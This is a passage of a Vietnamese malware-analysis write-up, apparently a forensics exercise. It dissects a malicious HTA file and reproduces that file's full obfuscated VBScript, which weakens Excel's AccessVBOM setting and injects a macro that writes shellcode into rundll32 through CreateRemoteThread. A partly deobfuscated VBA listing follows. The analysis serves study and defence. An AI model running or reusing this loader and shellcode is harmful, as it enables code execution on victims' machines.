Ở phần Registry changes thì nó chỉ ra những thay đổi mà file này thực hiện trên các khóa.
Giờ đi vào chi tiết, ở mục Modified files có 3 file, mình sẽ bắt đầu phân tích ở file LwTHLrGh.hta với thời gian thực thi lâu nhất.
```vb=
"<html><head><script language=""vbscript"">
Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule
Set objExcel = CreateObject(""Excel.Application"")
objExcel.Visible = False
Set WshShell = CreateObject(""Wscript.Shell"")
function RegExists(regKey)
on error resume next
WshShell.RegRead regKey
RegExists = (Err.number = 0)
end function
' Get the old AccessVBOM value
RegPath = ""HKEY_CURRENT_USER\Software\Microsoft\Office\"" & objExcel.Version & ""\Excel\Security\AccessVBOM""
if RegExists(RegPath) then
action = WshShell.RegRead(RegPath)
else
action = """"
end if
' Weaken the target
WshShell.RegWrite RegPath, 1, ""REG_DWORD""
' Run the macro
Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
xlmodule.CodeModule.AddFromString ""Private ""&""Type PRO""&""CESS_INF""&""ORMATION""&Chr(10)&"" hPro""&""cess As ""&""Long""&Chr(10)&"" hThr""&""ead As L""&""ong""&Chr(10)&"" dwPr""&""ocessId ""&""As Long""&Chr(10)&"" dwTh""&""readId A""&""s Long""&Chr(10)& _
""End Type""&Chr(10)&Chr(10)&""Private ""&""Type STA""&""RTUPINFO""&Chr(10)&"" cb A""&""s Long""&Chr(10)&"" lpRe""&""served A""&""s String""&Chr(10)&"" lpDe""&""sktop As""&"" String""&Chr(10)&"" lpTi""&""tle As S""&""tring""& _
Chr(10)&"" dwX ""&""As Long""&Chr(10)&"" dwY ""&""As Long""&Chr(10)&"" dwXS""&""ize As L""&""ong""&Chr(10)&"" dwYS""&""ize As L""&""ong""&Chr(10)&"" dwXC""&""ountChar""&""s As Lon""&""g""&Chr(10)&"" dwYC""&""ountChar""& _
""s As Lon""&""g""&Chr(10)&"" dwFi""&""llAttrib""&""ute As L""&""ong""&Chr(10)&"" dwFl""&""ags As L""&""ong""&Chr(10)&"" wSho""&""wWindow ""&""As Integ""&""er""&Chr(10)&"" cbRe""&""served2 ""&""As Integ""&""er""&Chr(10)&"" lpRe""& _
""served2 ""&""As Long""&Chr(10)&"" hStd""&""Input As""&"" Long""&Chr(10)&"" hStd""&""Output A""&""s Long""&Chr(10)&"" hStd""&""Error As""&"" Long""&Chr(10)&""End Type""&Chr(10)&Chr(10)&Chr(35)&""If VBA7 ""&""Then""&Chr(10)& _
"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Cre""&""ateStuff""&"" Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreateRe""&""moteThre""&""ad""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)& _
"" ByVal l""&""pThreadA""&""ttribute""&""s As Lon""&""g""&Chr(44)&"" ByVal d""&""wStackSi""&""ze As Lo""&""ng""&Chr(44)&"" ByVal l""&""pStartAd""&""dress As""&"" LongPtr""&Chr(44)&"" lpParam""&""eter As ""&""Long""&Chr(44)&"" ByVal d""& _
""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpThrea""&""dID As L""&""ong""&Chr(41)&"" As Long""&""Ptr""&Chr(10)&"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion All""&""ocStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""& _
Chr(34)&""VirtualA""&""llocEx""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""&""pAddr As""&"" Long""&Chr(44)&"" ByVal l""&""Size As ""&""Long""&Chr(44)&"" ByVal f""&""lAllocat""&""ionType ""&""As Long""& _
Chr(44)&"" ByVal f""&""lProtect""&"" As Long""&Chr(41)&"" As Long""&""Ptr""&Chr(10)&"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Wri""&""teStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""WritePro""& _
""cessMemo""&""ry""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""&""Dest As ""&""LongPtr""&Chr(44)&"" ByRef S""&""ource As""&"" Any""&Chr(44)&"" ByVal L""&""ength As""&"" Long""&Chr(44)&"" ByVal L""& _
""engthWro""&""te As Lo""&""ngPtr""&Chr(41)&"" As Long""&""Ptr""&Chr(10)&"" Priv""&""ate Decl""&""are PtrS""&""afe Func""&""tion Run""&""Stuff Li""&""b ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreatePr""&""ocessA""&Chr(34)& _
"" ""&Chr(40)&""ByVal lp""&""Applicat""&""ionName ""&""As Strin""&""g""&Chr(44)&"" ByVal l""&""pCommand""&""Line As ""&""String""&Chr(44)&"" lpProce""&""ssAttrib""&""utes As ""&""Any""&Chr(44)&"" lpThrea""&""dAttribu""&""tes As A""&""ny""& _
Chr(44)&"" ByVal b""&""InheritH""&""andles A""&""s Long""&Chr(44)&"" ByVal d""&""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpEnvir""&""onment A""&""s Any""&Chr(44)&"" ByVal l""&""pCurrent""&""Director""&""y As Str""&""ing""&Chr(44)& _
"" lpStart""&""upInfo A""&""s STARTU""&""PINFO""&Chr(44)&"" lpProce""&""ssInform""&""ation As""&"" PROCESS""&""_INFORMA""&""TION""&Chr(41)&"" As Long""&Chr(10)&Chr(35)&""Else""&Chr(10)&"" Priv""&""ate Decl""&""are Func""&""tion Cre""& _
""ateStuff""&"" Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreateRe""&""moteThre""&""ad""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""&""pThreadA""&""ttribute""&""s As Lon""&""g""&Chr(44)& _
"" ByVal d""&""wStackSi""&""ze As Lo""&""ng""&Chr(44)&"" ByVal l""&""pStartAd""&""dress As""&"" Long""&Chr(44)&"" lpParam""&""eter As ""&""Long""&Chr(44)&"" ByVal d""&""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpThrea""&""dID As L""& _
""ong""&Chr(41)&"" As Long""&Chr(10)&"" Priv""&""ate Decl""&""are Func""&""tion All""&""ocStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""VirtualA""&""llocEx""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""& _
""s Long""&Chr(44)&"" ByVal l""&""pAddr As""&"" Long""&Chr(44)&"" ByVal l""&""Size As ""&""Long""&Chr(44)&"" ByVal f""&""lAllocat""&""ionType ""&""As Long""&Chr(44)&"" ByVal f""&""lProtect""&"" As Long""&Chr(41)&"" As Long""&Chr(10)& _
"" Priv""&""ate Decl""&""are Func""&""tion Wri""&""teStuff ""&""Lib ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""WritePro""&""cessMemo""&""ry""&Chr(34)&"" ""&Chr(40)&""ByVal hP""&""rocess A""&""s Long""&Chr(44)&"" ByVal l""& _
""Dest As ""&""Long""&Chr(44)&"" ByRef S""&""ource As""&"" Any""&Chr(44)&"" ByVal L""&""ength As""&"" Long""&Chr(44)&"" ByVal L""&""engthWro""&""te As Lo""&""ng""&Chr(41)&"" As Long""&Chr(10)&"" Priv""&""ate Decl""&""are Func""&""tion Run""& _
""Stuff Li""&""b ""&Chr(34)&""kernel32""&Chr(34)&"" Alias ""&Chr(34)&""CreatePr""&""ocessA""&Chr(34)&"" ""&Chr(40)&""ByVal lp""&""Applicat""&""ionName ""&""As Strin""&""g""&Chr(44)&"" ByVal l""&""pCommand""&""Line As ""&""String""&Chr(44)& _
"" lpProce""&""ssAttrib""&""utes As ""&""Any""&Chr(44)&"" lpThrea""&""dAttribu""&""tes As A""&""ny""&Chr(44)&"" ByVal b""&""InheritH""&""andles A""&""s Long""&Chr(44)&"" ByVal d""&""wCreatio""&""nFlags A""&""s Long""&Chr(44)&"" lpEnvir""& _
""onment A""&""s Any""&Chr(44)&"" ByVal l""&""pCurrent""&""Driector""&""y As Str""&""ing""&Chr(44)&"" lpStart""&""upInfo A""&""s STARTU""&""PINFO""&Chr(44)&"" lpProce""&""ssInform""&""ation As""&"" PROCESS""&""_INFORMA""&""TION""&Chr(41)& _
"" As Long""&Chr(10)&Chr(35)&""End If""&Chr(10)&Chr(10)&""Sub Auto""&""_Open""&Chr(40)&Chr(41)&Chr(10)&"" Dim ""&""myByte A""&""s Long""&Chr(44)&"" myArray""&"" As Vari""&""ant""&Chr(44)&"" offset ""&""As Long""&Chr(10)&"" Dim ""& _
""pInfo As""&"" PROCESS""&""_INFORMA""&""TION""&Chr(10)&"" Dim ""&""sInfo As""&"" STARTUP""&""INFO""&Chr(10)&"" Dim ""&""sNull As""&"" String""&Chr(10)&"" Dim ""&""sProc As""&"" String""&Chr(10)&Chr(10)&Chr(35)&""If VBA7 ""& _
""Then""&Chr(10)&"" Dim ""&""rwxpage ""&""As LongP""&""tr""&Chr(44)&"" res As ""&""LongPtr""&Chr(10)&Chr(35)&""Else""&Chr(10)&"" Dim ""&""rwxpage ""&""As Long""&Chr(44)&"" res As ""&""Long""&Chr(10)&Chr(35)&""End If""&Chr(10)& _
"" myAr""&""ray ""&Chr(61)&"" Array""&Chr(40)&Chr(45)&""35""&Chr(44)&Chr(45)&""63""&Chr(44)&Chr(45)&""65""&Chr(44)&""32""&Chr(44)&""86""&Chr(44)&""66""&Chr(44)&""126""&Chr(44)&Chr(45)&""39""&Chr(44)&""116""&Chr(44)&""36""&Chr(44)& _
Chr(45)&""12""&Chr(44)&""91""&Chr(44)&""49""&Chr(44)&Chr(45)&""55""&Chr(44)&Chr(45)&""79""&Chr(44)&""98""&Chr(44)&""49""&Chr(44)&""123""&Chr(44)&""24""&Chr(44)&""3""&Chr(44)&""123""&Chr(44)&""24""&Chr(44)&Chr(45)&""125""&Chr(44)& _
Chr(45)&""61""&Chr(44)&""36""&Chr(44)&Chr(45)&""76""&Chr(44)&Chr(45)&""73""&Chr(44)&Chr(45)&""126""&Chr(44)&Chr(45)&""52""&Chr(44)&Chr(45)&""70""&Chr(44)&""56""&Chr(44)&""123""&Chr(44)&""12""&Chr(44)&Chr(45)&""37""&Chr(44)&Chr(45)& _
""79""&Chr(44)&Chr(45)&""98""&Chr(44)&""61""&Chr(44)&Chr(45)&""37""&Chr(44)&Chr(45)&""90""&Chr(44)&Chr(45)&""21""&Chr(44)&""109""&Chr(44)&Chr(45)&""21""&Chr(44)&Chr(45)&""83""&Chr(44)&Chr(45)&""66""&Chr(44)&Chr(45)&""127""&Chr(44)& _
Chr(45)&""128""&Chr(44)&Chr(45)&""32""&Chr(44)&""42""&Chr(44)&""18""&Chr(44)&Chr(45)&""28""&Chr(44)&""44""&Chr(44)&""92""&Chr(44)&Chr(45)&""109""&Chr(44)&""67""&Chr(44)&""11""&Chr(44)&""83""&Chr(44)&""36""&Chr(44)&Chr(45)&""1""&Chr(44)& _
""111""&Chr(44)&Chr(45)&""14""&Chr(44)&Chr(45)&""90""&Chr(44)&""2""&Chr(44)&Chr(45)&""68""&Chr(44)&Chr(45)&""44""&Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""52""&Chr(44)&Chr(45)&""79""&Chr(44)&""21""&Chr(44)&Chr(45)&""48""&Chr(44)& _
""49""&Chr(44)&""59""&Chr(44)&""71""&Chr(44)&Chr(45)&""119""&Chr(44)&""62""&Chr(44)&Chr(45)&""18""&Chr(44)&""120""&Chr(44)&Chr(45)&""66""&Chr(44)&""11""&Chr(44)&""51""&Chr(44)&Chr(45)&""14""&Chr(44)&Chr(45)&""116""&Chr(44)&Chr(45)& _
""102""&Chr(44)&""51""&Chr(44)&Chr(45)&""25""&Chr(44)&""68""&Chr(44)&Chr(45)&""100""&Chr(44)&""18""&Chr(44)&Chr(45)&""74""&Chr(44)&Chr(45)&""33""&Chr(44)&Chr(45)&""57""&Chr(44)&Chr(45)&""76""&Chr(44)&""56""&Chr(44)&""12""&Chr(44)& _
""124""&Chr(44)&Chr(45)&""3""&Chr(44)&""34""&Chr(44)&""81""&Chr(44)&Chr(45)&""71""&Chr(44)&Chr(45)&""73""&Chr(44)&Chr(45)&""39""&Chr(44)&Chr(45)&""95""&Chr(44)&""53""&Chr(44)&""70""&Chr(44)&""8""&Chr(44)&Chr(45)&""8""&Chr(44)&Chr(45)& _
""74""&Chr(44)&Chr(45)&""27""&Chr(44)&""117""&Chr(44)&""53""&Chr(44)&""69""&Chr(44)&Chr(45)&""9""&Chr(44)&Chr(45)&""78""&Chr(44)&Chr(45)&""15""&Chr(44)&Chr(45)&""74""&Chr(44)&Chr(45)&""126""&Chr(44)&Chr(45)&""54""&Chr(44)&""2""& _
Chr(44)&""74""&Chr(44)&Chr(45)&""107""&Chr(44)&""8""&Chr(44)&""121""&Chr(44)&Chr(45)&""112""&Chr(44)&""16""&Chr(44)&Chr(45)&""117""&Chr(44)&Chr(45)&""39""&Chr(44)&""83""&Chr(44)&Chr(45)&""126""&Chr(44)&""119""&Chr(44)&Chr(45)& _
""40""&Chr(44)&Chr(45)&""80""&Chr(44)&""85""&Chr(44)&Chr(45)&""13""&Chr(44)&Chr(45)&""42""&Chr(44)&""125""&Chr(44)&""17""&Chr(44)&""91""&Chr(44)&Chr(45)&""6""&Chr(44)&Chr(45)&""128""&Chr(44)&Chr(45)&""10""&Chr(44)&Chr(45)&""41""& _
Chr(44)&""6""&Chr(44)&""8""&Chr(44)&Chr(45)&""7""&Chr(44)&""55""&Chr(44)&Chr(45)&""113""&Chr(44)&""74""&Chr(44)&Chr(45)&""34""&Chr(44)&Chr(45)&""109""&Chr(44)&Chr(45)&""44""&Chr(44)&""9""&Chr(44)&""127""&Chr(44)&Chr(45)&""123""& _
Chr(44)&Chr(45)&""80""&Chr(44)&Chr(45)&""4""&Chr(44)&Chr(45)&""128""&Chr(44)&Chr(45)&""43""&Chr(44)&""27""&Chr(44)&Chr(45)&""96""&Chr(44)&""36""&Chr(44)&Chr(45)&""99""&Chr(44)&Chr(45)&""79""&Chr(44)&Chr(45)&""75""&Chr(44)&""84""& _
Chr(44)&Chr(45)&""4""&Chr(44)&Chr(45)&""35""&Chr(44)&""122""&Chr(44)&""85""&Chr(44)&Chr(45)&""1""&Chr(44)&""29""&Chr(44)&""21""&Chr(44)&Chr(45)&""18""&Chr(44)&Chr(45)&""116""&Chr(44)&""47""&Chr(44)&Chr(45)&""70""&Chr(44)&""68""& _
Chr(44)&""27""&Chr(44)&""3""&Chr(44)&""51""&Chr(44)&""67""&Chr(44)&Chr(45)&""36""&Chr(44)&""100""&Chr(44)&""110""&Chr(44)&""51""&Chr(44)&""114""&Chr(44)&Chr(45)&""101""&Chr(44)&Chr(45)&""111""&Chr(44)&""68""&Chr(44)&""90""&Chr(44)& _
""95""&Chr(44)&Chr(45)&""59""&Chr(44)&""20""&Chr(44)&Chr(45)&""12""&Chr(44)&""118""&Chr(44)&""102""&Chr(44)&Chr(45)&""1""&Chr(44)&""4""&Chr(44)&""119""&Chr(44)&Chr(45)&""77""&Chr(44)&""80""&Chr(44)&""85""&Chr(44)&Chr(45)&""41""&Chr(44)& _
""108""&Chr(44)&""17""&Chr(44)&""5""&Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""36""&Chr(44)&Chr(45)&""7""&Chr(44)&""79""&Chr(44)&""24""&Chr(44)&""2""&Chr(44)&""25""&Chr(44)&""112""&Chr(44)&Chr(45)&""13""&Chr(44)&""43""&Chr(44)&""50""& _
Chr(44)&Chr(45)&""88""&Chr(44)&Chr(45)&""5""&Chr(44)&""83""&Chr(44)&Chr(45)&""61""&Chr(44)&Chr(45)&""46""&Chr(44)&Chr(45)&""115""&Chr(44)&""58""&Chr(44)&Chr(45)&""81""&Chr(44)&""49""&Chr(44)&""21""&Chr(44)&Chr(45)&""46""&Chr(44)& _
""66""&Chr(44)&""43""&Chr(44)&Chr(45)&""68""&Chr(44)&""66""&Chr(44)&Chr(45)&""77""&Chr(44)&Chr(45)&""59""&Chr(44)&""81""&Chr(44)&Chr(45)&""76""&Chr(44)&Chr(45)&""125""&Chr(44)&""77""&Chr(44)&Chr(45)&""17""&Chr(44)&Chr(45)&""79""& _
Chr(44)&""116""&Chr(44)&""94""&Chr(44)&Chr(45)&""80""&Chr(44)&""2""&Chr(44)&""72""&Chr(44)&Chr(45)&""22""&Chr(44)&""17""&Chr(44)&Chr(45)&""7""&Chr(44)&Chr(45)&""58""&Chr(44)&""33""&Chr(44)&Chr(45)&""14""&Chr(44)&""113""&Chr(44)& _
""127""&Chr(44)&""119""&Chr(44)&""127""&Chr(44)&""26""&Chr(44)&""76""&Chr(44)&""37""&Chr(44)&""2""&Chr(44)&Chr(45)&""38""&Chr(44)&Chr(45)&""38""&Chr(44)&""96""&Chr(44)&Chr(45)&""44""&Chr(44)&Chr(45)&""18""&Chr(44)&Chr(45)&""102""& _
Chr(44)&Chr(45)&""116""&Chr(44)&Chr(45)&""15""&Chr(44)&Chr(45)&""124""&Chr(44)&Chr(45)&""37""&Chr(44)&""110""&Chr(44)&Chr(45)&""109""&Chr(44)&Chr(45)&""112""&Chr(44)&Chr(45)&""117""&Chr(44)&Chr(45)&""26""&Chr(44)&""97""&Chr(44)& _
Chr(45)&""91""&Chr(44)&""42""&Chr(44)&""76""&Chr(44)&Chr(45)&""20""&Chr(44)&""67""&Chr(44)&""70""&Chr(44)&Chr(45)&""94""&Chr(44)&Chr(45)&""72""&Chr(44)&Chr(45)&""36""&Chr(44)&Chr(45)&""1""&Chr(44)&""91""&Chr(44)&Chr(45)&""31""& _
Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""98""&Chr(44)&Chr(45)&""92""&Chr(44)&""60""&Chr(44)&Chr(45)&""46""&Chr(44)&Chr(45)&""95""&Chr(44)&""47""&Chr(44)&Chr(45)&""76""&Chr(44)&""34""&Chr(44)&""111""&Chr(44)&Chr(45)&""40""&Chr(44)& _
Chr(45)&""67""&Chr(44)&""48""&Chr(44)&Chr(45)&""104""&Chr(44)&Chr(45)&""65""&Chr(44)&""61""&Chr(44)&Chr(45)&""55""&Chr(44)&""89""&Chr(44)&""42""&Chr(44)&""61""&Chr(44)&Chr(45)&""93""&Chr(44)&""93""&Chr(44)&Chr(45)&""4""&Chr(44)& _
""106""&Chr(44)&""91""&Chr(44)&""92""&Chr(44)&Chr(45)&""39""&Chr(44)&""92""&Chr(44)&Chr(45)&""60""&Chr(44)&Chr(45)&""97""&Chr(44)&""12""&Chr(44)&Chr(45)&""33""&Chr(44)&""3""&Chr(44)&""95""&Chr(44)&Chr(45)&""47""&Chr(44)&Chr(45)& _
""23""&Chr(44)&""120""&Chr(44)&""86""&Chr(44)&""71""&Chr(44)&""85""&Chr(44)&""23""&Chr(44)&Chr(45)&""105""&Chr(44)&Chr(45)&""121""&Chr(44)&""85""&Chr(44)&Chr(45)&""25""&Chr(44)&Chr(45)&""63""&Chr(44)&Chr(45)&""51""&Chr(44)&""85""& _
Chr(44)&Chr(45)&""113""&Chr(44)&Chr(45)&""75""&Chr(44)&Chr(45)&""75""&Chr(44)&""6""&Chr(44)&Chr(45)&""86""&Chr(44)&Chr(45)&""71""&Chr(44)&""99""&Chr(44)&""59""&Chr(44)&""103""&Chr(44)&""44""&Chr(44)&Chr(45)&""116""&Chr(44)&""109""& _
Chr(44)&Chr(45)&""37""&Chr(44)&Chr(45)&""25""&Chr(44)&Chr(45)&""28""&Chr(44)&Chr(45)&""109""&Chr(44)&""2""&Chr(44)&Chr(45)&""49""&Chr(44)&Chr(45)&""86""&Chr(44)&""108""&Chr(44)&""97""&Chr(44)&""83""&Chr(44)&Chr(45)&""84""&Chr(44)& _
Chr(45)&""110""&Chr(44)&Chr(45)&""9""&Chr(44)&""124""&Chr(44)&""21""&Chr(44)&Chr(45)&""6""&Chr(44)&""7""&Chr(44)&""61""&Chr(44)&Chr(45)&""91""&Chr(44)&Chr(45)&""6""&Chr(44)&""109""&Chr(44)&Chr(45)&""67""&Chr(44)&Chr(45)&""11""& _
Chr(44)&Chr(45)&""110""&Chr(44)&""122""&Chr(44)&Chr(45)&""110""&Chr(44)&Chr(45)&""6""&Chr(44)&""82""&Chr(44)&Chr(45)&""126""&Chr(44)&""57""&Chr(44)&""83""&Chr(44)&Chr(45)&""6""&Chr(44)&""9""&Chr(44)&Chr(45)&""84""&Chr(44)&""17""& _
Chr(44)&Chr(45)&""101""&Chr(44)&""14""&Chr(44)&Chr(45)&""27""&Chr(44)&Chr(45)&""12""&Chr(44)&""5""&Chr(44)&""14""&Chr(44)&""10""&Chr(44)&""45""&Chr(44)&Chr(45)&""74""&Chr(44)&""117""&Chr(44)&""95""&Chr(44)&Chr(45)&""46""&Chr(44)& _
""55""&Chr(44)&Chr(45)&""118""&Chr(44)&Chr(45)&""119""&Chr(44)&Chr(45)&""73""&Chr(44)&""56""&Chr(44)&Chr(45)&""118""&Chr(44)&Chr(45)&""75""&Chr(44)&Chr(45)&""55""&Chr(44)&""5""&Chr(44)&""92""&Chr(44)&Chr(45)&""116""&Chr(44)&Chr(45)& _
""65""&Chr(44)&""72""&Chr(44)&""92""&Chr(44)&Chr(45)&""85""&Chr(44)&Chr(45)&""80""&Chr(44)&Chr(45)&""1""&Chr(44)&Chr(45)&""63""&Chr(44)&Chr(45)&""102""&Chr(44)&""90""&Chr(44)&Chr(45)&""1""&Chr(44)&""86""&Chr(44)&Chr(45)&""36""&Chr(44)& _
""78""&Chr(41)&Chr(10)&"" If L""&""en""&Chr(40)&""Environ""&Chr(40)&Chr(34)& _
""ProgramW""&""6432""&Chr(34)&Chr(41)&Chr(41)&"" ""&Chr(62)&"" 0 Then""&Chr(10)&"" ""&""sProc ""&Chr(61)&"" Environ""&Chr(40)&Chr(34)&""windir""&Chr(34)&Chr(41)&"" ""&Chr(38)&"" ""&Chr(34)&Chr(92)&Chr(92)&""SysWOW64""& _
Chr(92)&Chr(92)&""rundll32""&Chr(46)&""exe""&Chr(34)&Chr(10)&"" Else""&Chr(10)&"" ""&""sProc ""&Chr(61)&"" Environ""&Chr(40)&Chr(34)&""windir""&Chr(34)&Chr(41)&"" ""&Chr(38)&"" ""&Chr(34)&Chr(92)&Chr(92)&""System32""& _
Chr(92)&Chr(92)&""rundll32""&Chr(46)&""exe""&Chr(34)&Chr(10)&"" End ""&""If""&Chr(10)&Chr(10)&"" res ""&Chr(61)&"" RunStuf""&""f""&Chr(40)&""sNull""&Chr(44)&"" sProc""&Chr(44)&"" ByVal 0""&Chr(38)&Chr(44)&"" ByVal 0""& _
Chr(38)&Chr(44)&"" ByVal 1""&Chr(38)&Chr(44)&"" ByVal 4""&Chr(38)&Chr(44)&"" ByVal 0""&Chr(38)&Chr(44)&"" sNull""&Chr(44)&"" sInfo""&Chr(44)&"" pInfo""&Chr(41)&Chr(10)&Chr(10)&"" rwxp""&""age ""&Chr(61)&"" AllocSt""& _
""uff""&Chr(40)&""pInfo""&Chr(46)&""hProcess""&Chr(44)&"" 0""&Chr(44)&"" UBound""&Chr(40)&""myArray""&Chr(41)&Chr(44)&"" ""&Chr(38)&""H1000""&Chr(44)&"" ""&Chr(38)&""H40""&Chr(41)&Chr(10)&"" For ""&""offset ""&Chr(61)&"" LBound""& _
Chr(40)&""myArray""&Chr(41)&"" To UBou""&""nd""&Chr(40)&""myArray""&Chr(41)&Chr(10)&"" ""&""myByte ""&Chr(61)&"" myArray""&Chr(40)&""offset""&Chr(41)&Chr(10)&"" ""&""res ""&Chr(61)&"" WriteSt""&""uff""&Chr(40)&""pInfo""& _
Chr(46)&""hProcess""&Chr(44)&"" rwxpage""&"" ""&Chr(43)&"" offset""&Chr(44)&"" myByte""&Chr(44)&"" 1""&Chr(44)&"" ByVal 0""&Chr(38)&Chr(41)&Chr(10)&"" Next""&"" offset""&Chr(10)&"" res ""&Chr(61)&"" CreateS""&""tuff""&Chr(40)& _
""pInfo""&Chr(46)&""hProcess""&Chr(44)&"" 0""&Chr(44)&"" 0""&Chr(44)&"" rwxpage""&Chr(44)&"" 0""&Chr(44)&"" 0""&Chr(44)&"" 0""&Chr(41)&Chr(10)&""End Sub""&Chr(10)&""Sub Auto""&""Open""&Chr(40)&Chr(41)&Chr(10)&"" Auto""&""_Open""& _
Chr(10)&""End Sub""&Chr(10)&""Sub Work""&""book_Ope""&""n""&Chr(40)&Chr(41)&Chr(10)&"" Auto""&""_Open""&Chr(10)&""End Sub""&Chr(10)
objExcel.DisplayAlerts = False
on error resume next
objExcel.Run ""Auto_Open""
objWorkbook.Close False
objExcel.Quit
' Restore the registry to its old state
if action = """" then
WshShell.RegDelete RegPath
else
WshShell.RegWrite RegPath, action, ""REG_DWORD""
end if
self.close
</script></head></html>"
```
Ngay dòng đầu tiên đã thông báo cho mình biết đây file này được viết bằng vbascript, phần đầu phần cuối thì ở dạng mà mình đọc được còn phần giữa là bị obfuscate.
Với đoạn đầu tiên, từ dòng macro trở lên trên :
::: success
Đoạn mã này sử dụng VBScript để thao tác với cài đặt bảo mật của Microsoft Excel. Nó kiểm tra xem một khóa Registry cụ thể có tồn tại hay không và sau đó thay đổi giá trị của nó để cho phép chạy mã macro (VBA) động trong Excel. Cụ thể ở đây là set VBOM về 1, nghĩa là cho phép chạy mã macro (VBA) động trong các tệp Excel.
:::
Với đoạn cuối :
::: success
Đoạn này sẽ tắt những thông báo lỗi nếu có thể xảy ra trong quá trình chạy macro, đồng thời khôi phục VBOM về giá trị ban đầu.
:::
Và đoạn giữa là cái đoạn mà mình cần khai thác, nhìn kĩ thì mình thấy đây là các chuỗi được viết bằng char(số) và nối với nhau bằng '&'. Mình sẽ dùng cyberchef để deobfuscate nó.
| Find | Replace |
| -------- | --------|
| "" | " |
| "&" | |
Tiếp theo mình paste output ra VScode để chỉnh thêm một tí, nên tải vba về để nhìn cho dễ chỉnh, đoạn này chỉ cần mình cẩn thận với có tí kiến thức syntax của vba là được vì mình làm thủ công bằng tay =))
Đây là đoạn vba mà mình đã cố chỉnh sao cho dễ nhìn hết mức có thể.
```vb=
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChar As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
